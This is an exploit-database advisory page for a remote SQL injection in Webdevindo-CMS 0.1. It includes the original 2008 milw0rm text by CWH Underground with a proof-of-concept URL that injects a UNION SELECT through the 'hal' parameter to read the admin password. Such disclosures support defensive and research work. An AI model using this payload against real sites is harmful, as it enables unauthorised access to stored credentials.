header-logo
Suggest Exploit
vendor:
Webdevindo-CMS
by:
CWH Underground
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Webdevindo-CMS
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:webdevindo:webdevindo_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability

A vulnerability exists in Webdevindo-CMS 0.1, which allows an attacker to inject arbitrary SQL commands via the 'hal' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

=========================================================================
  Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability
=========================================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 25 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Webdevindo-CMS 
 VERSION     : 1.0.0
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/webdevindo-cms
#####################################################

--- Remote SQL Injection ---

---------
 Exploit
---------

[+] http://[Target]/[webdevindo_path]/index.php?hal=[SQL Injection]

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/webdevindo/index.php?hal=-99999'/**/union/**/select/**/Password/**/from/**/jos_user/**/where/**/LoginName='admin


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-25]

Navigation

Suggest Exploit

Services By CQR